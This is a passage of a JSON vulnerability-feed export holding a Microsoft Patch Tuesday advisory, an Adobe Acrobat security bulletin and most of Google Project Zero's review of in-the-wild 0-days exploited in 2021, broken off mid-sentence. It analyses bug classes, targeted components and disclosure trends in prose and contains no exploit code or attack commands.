"CVE-2021-40444", "CVE-2021-44228", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105", "CVE-2022-22022", "CVE-2022-22026", "CVE-2022-22028", "CVE-2022-22029", "CVE-2022-22034", "CVE-2022-22038", "CVE-2022-22039", "CVE-2022-22047", "CVE-2022-22049", "CVE-2022-2294", "CVE-2022-2295", "CVE-2022-2624", "CVE-2022-30190", "CVE-2022-30206", "CVE-2022-30220", "CVE-2022-30226", "CVE-2022-3075", "CVE-2022-33636", "CVE-2022-33649", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-34718", "CVE-2022-34724", "CVE-2022-35743", "CVE-2022-35750", "CVE-2022-35796", "CVE-2022-35803", "CVE-2022-37969", "CVE-2022-38012", "CVE-2022-38476", "CVE-2022-38477", "CVE-2022-38478", "CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-11-18T08:10:34", "id": "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "href": "https://securelist.com/it-threat-evolution-in-q3-2022-non-mobile-statistics/107963/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2021-08-23T15:19:10", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/08/TA202129.pdf>)\n\nMultiple vulnerabilities have been patched by Microsoft in August 2021 Patch Tuesday. Three of them have been labeled as zero-day vulnerabilities (CVE-2021-36936, CVE-2021-36942, and CVE-2021-36948). One of them (CVE-2021-36948) has already been exploited in the wild. The attacker is yet to be identified. Microsoft has classified six vulnerabilities as critical, and patches for all of them are now available.\n\n#### Vulnerability Details\n\n \n\n#### Patch Links\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36948>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34530>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34534>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36936>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26432>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34480>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34535>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26424>\n\n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942>\n\n#### References\n\n<https://www.bleepingcomputer.com/news/microsoft/microsoft-august-2021-patch-tuesday-fixes-3-zero-days-44-flaws/>", "cvss3": {}, "published": "2021-08-11T13:25:48", "type": "hivepro", "title": "Critical Vulnerabilities revealed in Microsoft\u2019s Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26424", "CVE-2021-26432", "CVE-2021-34480", "CVE-2021-34530", "CVE-2021-34534", "CVE-2021-34535", "CVE-2021-36936", "CVE-2021-36942", "CVE-2021-36948"], "modified": "2021-08-11T13:25:48", "id": "HIVEPRO:1BBAC0CD5F3681EC49D06BE85DC90A92", "href": "https://www.hivepro.com/critical-vulnerabilities-revealed-in-microsofts-patch-tuesday/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "adobe": [{"lastseen": "2023-05-27T17:13:01", "description": "Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address multiple [critical]() and [important]() vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "adobe", "title": "APSB21-29 Security\u202fupdate available for Adobe Acrobat and Reader", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-28550", "CVE-2021-28553", "CVE-2021-28555", "CVE-2021-28557", "CVE-2021-28558", "CVE-2021-28559", "CVE-2021-28560", "CVE-2021-28561", "CVE-2021-28562", "CVE-2021-28564", "CVE-2021-28565"], "modified": "2021-05-11T00:00:00", "id": "APSB21-29", "href": "https://helpx.adobe.com/security/products/acrobat/apsb21-29.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2023-06-07T14:47:45", "description": "A Year in Review of 0-days Used In-the-Wild in 2021\n\nPosted by Maddie Stone, Google Project Zero\n\nThis is our third annual year in review of 0-days exploited in-the-wild [[2020](<https://googleprojectzero.blogspot.com/2021/02/deja-vu-lnerability.html>), [2019](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>)]. Each year we\u2019ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you\u2019re interested in the analysis of individual exploits, please check out our [root cause analysis repository](<https://googleprojectzero.blogspot.com/p/rca.html>).\n\nWe perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard [over](<https://forbiddenstories.org/about-the-pegasus-project/>) and [over](<https://citizenlab.ca/2021/07/hooking-candiru-another-mercenary-spyware-vendor-comes-into-focus/>) and [over](<https://www.amnesty.org/en/latest/research/2021/11/devices-of-palestinian-human-rights-defenders-hacked-with-nso-groups-pegasus-spyware-2/>) about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans\u2019 lives.\n\nWe\u2019ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check-out the Executive Summary and Conclusion.\n\n# Executive Summary\n\n2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That\u2019s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We\u2019ve tracked publicly known in-the-wild 0-day exploits in [this spreadsheet](<https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=0>) since mid-2014.\n\nWhile we often talk about the number of 0-day exploits used in-the-wild, what we\u2019re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.\n\nWith this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn\u2019t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero\u2019s mission is \u201cmake 0day hard\u201d. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous &amp; publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.\n\nSo while we recognize the industry\u2019s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there\u2019s a lot more improving to be done. Having access to more \u201cground truth\u201d of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.\n\nWe had so many more data points in 2021 to learn about attacker behavior than we\u2019ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they\u2019re using or what percentage of 0-days we\u2019re missing in our tracking, so we\u2019ll never know exactly what proportion of 0-days are currently being found and disclosed publicly. \n\nBased on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:\n\n 1. All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.\n 2. Exploit samples or detailed technical descriptions of the exploits are shared more widely.\n 3. Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.\n\n# A Record Year for In-the-Wild 0-days\n\n2021 was a record year for in-the-wild 0-days. So what happened?\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjC72HVhQEdwHNIzMiyb18bUFr6hPCWJiKL2Mm43-tW11qc0ucOPI8A9oChEXQe0-QNOBF83SIcfyjcyvPveuWvgipbiBzHWqZTx2-LilJFYIbx6uQeno9f481HJQ0CgylQkh8Ks7AbGC6tjhYDNBcI7jh6ihhzJATA0r_P4bQUBm-1lmHp2DPvWM6I/s1200/image1%287%29.png>)\n\nIs it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.\n\nWhile we often talk about \u201c0-day exploits used in-the-wild\u201d, what we\u2019re actually tracking are \u201c0-day exploits detected and disclosed as used in-the-wild\u201d. There are more factors than just the use that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparently disclosed exploited 0-day vulnerabilities is a positive indicator for security and progress in the industry. \n\nOverall, we can break down the uptick in the number of in-the-wild 0-days into:\n\n * More detection of in-the-wild 0-day exploits\n * More public disclosure of in-the-wild 0-day exploitation\n\n## More detection\n\nIn the [2019 Year in Review](<https://googleprojectzero.blogspot.com/2020/07/detection-deficit-year-in-review-of-0.html>), we wrote about the \u201cDetection Deficit\u201d. We stated \u201cAs a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can\u2019t draw significant conclusions due to the lack of (and biases in) the data we have collected.\u201d In the last two years, we believe that there\u2019s been progress on this gap. \n\nAnecdotally, we hear from more people that they\u2019ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we\u2019re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMbFpoEKSSn5AbAzsovaZ0yN6_OFXo9u4hpDCXJBpro8LRUWJlVQ9CSqtzT2V9ohrhOvP3_RnrYsOzFGPK0FZGJmW2713g2vVW82ReJVXpjAZc57BCxtHg8i-6AdR_ThDZB6UKvzAKekbmAkuUBliMyDyWSBW87z4ZZQJC3KX-_ptZIHveotLGoJ9I/s1200/image5%284%29.png>)\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRS0t_2Bwvc3U_EIr5h7NcWpQyjzHCPb4OMiDpzPxPs587otAEj8bzwch8UMFlgKchwdSq4L_PXRn1O6KGLHUl4X9voLBdZJNQsgQyJcMCVB4Y8-aRHaXRpOYZw7KVtyNYwdWpwX8ILUV1fyG2kDsXVWORsSPUBGVTON90gWf9POhhxA4edxNe1eoV/s1200/image2%285%29.png>)\n\nWe\u2019ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it\u2019s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!\n\n## More disclosure\n\nThe second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate \u201cGoogle Android\u201d rather than just \u201cGoogle\u201d because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don\u2019t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by \u201cAnonymous\u201d reporters. If the reporters didn\u2019t want credit for the vulnerability, it\u2019s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn\u2019t have been included in this year\u2019s list if Apple and Google Android had not begun transparently annotating their security advisories. \n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPe_J-0Wu9Ap-0n3Yj5BoXiWTnjViyyGasIChhb3juADZosK9nTbyiaWtzuRyjwG3frQNjLsvRMRoQHrFfo1iKa3GjmcuLHqat40GcoechQ16XbhpVGwF7m_TJ0Oucvy3wvm8x0aXbVnJfhkG2FNkxI4cJf5ONBqEYnPxQDUmZChvByLHE8OzSU20N/s1200/image3%287%29.png>)\n\nKudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for [CVE-2021-41773](<https://httpd.apache.org/security/vulnerabilities_24.html>) this past year. \n\nIn-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendor\u2019s own security advisories.\n\nIt's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we\u2019re confident that all vendors are transparently disclosing in-the-wild status, there\u2019s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.\n\n# New Year, Old Techniques\n\nWe had a record number of \u201cdata points\u201d in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, out of all those data points, there was nothing new amongst all this data. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit \u201cshapes\u201d previously seen in public research. Once \u201c0-day is hard\u201d, we\u2019d expect that to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never before seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty \u201c[meh](<https://www.dictionary.com/browse/meh#:~:text=unimpressive%3B%20boring%3A>)\u201d or standard.\n\nOut of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it\u2019s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes:\n\n * 17 use-after-free\n * 6 out-of-bounds read &amp; write\n * 4 buffer overflow\n * 4 integer overflow\n\nIn the next sections we\u2019ll dive into each major platform that we saw in-the-wild 0-days for this year. We\u2019ll share the trends and explain why what we saw was pretty unexceptional.\n\n## Chromium (Chrome)\n\nChromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.\n\nThe 14 0-day vulnerabilities were in the following components:\n\n * 6 JavaScript Engine - v8 ([CVE-2021-21148](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30551](<https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>), [CVE-2021-30563](<https://chromereleases.googleblog.com/2021/07/stable-channel-update-for-desktop.html>), [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>), [CVE-2021-37975](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-37975.html>), [CVE-2021-38003](<https://chromereleases.googleblog.com/2021/10/stable-channel-update-for-desktop_28.html>))\n * 2 DOM Engine - Blink ([CVE-2021-21193](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>) &amp; [CVE-2021-21206](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>))\n * 1 WebGL ([CVE-2021-30554](<https://chromereleases.googleblog.com/2021/06/stable-channel-update-for-desktop_17.html>))\n * 1 IndexedDB ([CVE-2021-30633](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>))\n * 1 webaudio ([CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>))\n * 1 Portals ([CVE-2021-37973](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_24.html>))\n * 1 Android Intents ([CVE-2021-38000](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-38000.html>))\n * 1 Core ([CVE-2021-37976](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop_30.html>))\n\nWhen we look at the components targeted by these bugs, they\u2019re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few less DOM bugs and more targeting these other components of browsers like IndexedDB and WebGL than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.\n\nA couple of the Chromium bugs were even similar to previous in-the-wild 0-days. [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>) is an issue in ScriptProcessorNode::Process() in webaudio where there\u2019s insufficient locks such that buffers are accessible in both the main thread and the audio rendering thread at the same time. [CVE-2019-13720](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2019/CVE-2019-13720.html>) is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where there were also insufficient locks such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.\n\n[CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) is another Chromium in-the-wild 0-day from 2021. It\u2019s a type confusion in the TurboFan JIT in Chromium\u2019s JavaScript Engine, v8, where Turbofan fails to deoptimize code after a property map is changed. [CVE-2021-30632](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30632.html>) in particular deals with code that stores global properties. [CVE-2020-16009](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2020/CVE-2020-16009.html>) was also an in-the-wild 0-day that was due to Turbofan failing to deoptimize code after map deprecation.\n\n## WebKit (Safari)\n\nPrior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due the sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don\u2019t have historical samples to go off of. Instead, we\u2019ll look at 2021\u2019s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days. \n\nThe 7 in-the-wild 0-days targeted the following components:\n\n * 4 Javascript Engine - JavaScript Core ([CVE-2021-1870](<https://support.apple.com/en-us/HT212146>), [CVE-2021-1871](<https://support.apple.com/en-us/HT212146>), [CVE-2021-30663](<https://support.apple.com/en-us/HT212336>), [CVE-2021-30665](<https://support.apple.com/en-us/HT212336>))\n * 1 IndexedDB ([CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>))\n * 1 Storage ([CVE-2021-30661](<https://support.apple.com/en-us/HT212317>))\n * 1 Plugins ([CVE-2021-1879](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1879.html>))\n\nThe one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021. \n\nIt would not be surprising if attackers are beginning to shift to other modules, like third party libraries or things like IndexedDB. The modules may be more promising to attackers going forward because there\u2019s a better chance that the vulnerability may exist in multiple browsers or platforms. For example, the webaudio bug in Chromium, [CVE-2021-21166](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-21166.html>), also existed in WebKit and was fixed as [CVE-2021-1844](<https://support.apple.com/en-us/HT212223>), though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, [CVE-2021-30858](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-30858.html>), was very, very similar to a [bug fixed in Chromium in January 2020](<https://bugs.chromium.org/p/chromium/issues/detail?id=1032890>).\n\n## Internet Explorer\n\nSince we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we\u2019ve ever tracked even though Internet Explorer\u2019s market share of web browser users continues to decrease.\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbMTlnGhVLcVL8K20S3s6hSrpyB6kZAA9CWvWNpn1isbEbLFv0c2rs_dPvM0ALT45NtTvyhp8rGehGDRIAEJ6OZYSkk5mezOEoPJOquVXXyHeqrVOvRGEiQHv_J7Je8Itjc5qhwXMCR-E4y79abuxiddCYoeF2VrVakY-L1q82NeMEPjTA0fFC-t8h/s1200/image4%286%29.png>)\n\nSo why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn\u2019t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent to what we\u2019ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats. \n\nThe four 0-days targeted the following components:\n\n * MSHTML browser engine ([CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>), [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2021/CVE-2021-33742.html>), [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>))\n * Javascript Engine - JScript9 ([CVE-2021-34448](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34448>))\n\nFor [CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>) targets of the campaign initially received a .mht file, which prompted the user to open in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) and [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>) were delivered to targets via malicious Office documents.\n\n[CVE-2021-26411](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-26411.html>) and [CVE-2021-33742](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-33742.html>) were two common memory corruption bug patterns: a use-after-free due to a user controlled callback in between two actions using an object and the user frees the object during that callback and a buffer overflow.\n\nThere were a few different vulnerabilities used in the exploit chain that used [CVE-2021-40444](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444>), but the one within MSHTML was that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.\n\n## Windows\n\nWindows is the platform where we\u2019ve seen the most change in components targeted compared with previous years. However, this shift has generally been in progress for a few years and predicted with the end-of-life of Windows 7 in 2020 and thus why it\u2019s still not especially novel.\n\nIn 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:\n\n * 2 Enhanced crypto provider ([CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>), [CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>))\n * 2 NTOS kernel ([CVE-2021-33771](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33771>), [CVE-2021-31979](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31979>))\n * 2 Win32k ([CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>), [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>))\n * 1 Windows update medic ([CVE-2021-36948](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36948>)) \n * 1 SuperFetch ([CVE-2021-31955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31955>))\n * 1 dwmcore.dll ([CVE-2021-28310](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-28310>))\n * 1 ntfs.sys ([CVE-2021-31956](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31956>))\n\nThe number of different components targeted is the shift from past years. For example, in 2019 75% of Windows 0-days targeted Win32k while in 2021 Win32k only made up 20% of the Windows 0-days. The reason that this was expected and predicted was that 6 out of 8 of those 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at that time; they were targeting older versions. With Windows 10 Microsoft began dedicating more and more resources to locking down the attack surface of Win32k so as those older versions have hit end-of-life, Win32k is a less and less attractive attack surface.\n\nSimilar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The user calls functions that change the state of an object during the callback and Win32k does not correctly handle those changes. [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn\u2019t check this and writes that field as a user-mode pointer without clearing the flag. The first in-the-wild 0-day detected and disclosed in 2022, [CVE-2022-21882](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-21882.html>), is due to [CVE-2021-1732](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) actually not being fixed completely. The attackers found a way to bypass the original patch and still trigger the vulnerability. [CVE-2021-40449](<https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/>) is a use-after-free in NtGdiResetDC due to the object being freed during the user callback. \n\n## iOS/macOS\n\nAs discussed in the \u201cMore disclosure\u201d section above, 2021 was the first full year that Apple annotated their release notes with in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year. The first publicly known macOS in-the-wild 0-day ([CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>)) was also found. In this section we\u2019re going to discuss iOS and macOS together because: 1) the two operating systems include similar components and 2) the sample size for macOS is very small (just this one vulnerability).\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPGaOlQUGIYyvpDY_M0rGh3JekH4mwXHfN459HYcklg74v4Mfp8j6fgh2SM09mjhA4svdgN_TdSN3R5Bb-DJTHnlo63qnRTsvLs1EZgAE3fBpRtsZhxKhyBNTb_khdS6mNT3EtSHnS_R-TshtHx-gSWnEPpHjmSqO_9Y7JxupGcDKZ0-xwsxgbX6zR/s1200/image6%284%29.png>)\n\nFor the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:\n\n * IOMobileFrameBuffer ([CVE-2021-30807](<https://support.apple.com/en-us/HT212623>), [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>))\n * XNU Kernel ([CVE-2021-1782](<https://support.apple.com/en-us/HT212146>) &amp; [CVE-2021-30869](<https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/>))\n * CoreGraphics ([CVE-2021-30860](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>))\n * CommCenter ([FORCEDENTRY sandbox escape](<https://googleprojectzero.blogspot.com/2022/03/forcedentry-sandbox-escape.html>) \\- CVE requested, not yet assigned)\n\nThese 4 attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used [CVE-2016-4654](<https://www.blackhat.com/docs/us-16/materials/us-16-Wang-Pangu-9-Internals.pdf>), a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen\u2019s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP. It\u2019s a popular attack surface because historically it\u2019s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. [CVE-2021-30807](<https://support.apple.com/en-us/HT212623>) is an out-of-bounds read and [CVE-2021-30883](<https://support.apple.com/en-us/HT212846>) is an integer overflow, both common memory corruption vulnerabilities. In 2022, we already have another in-the-wild 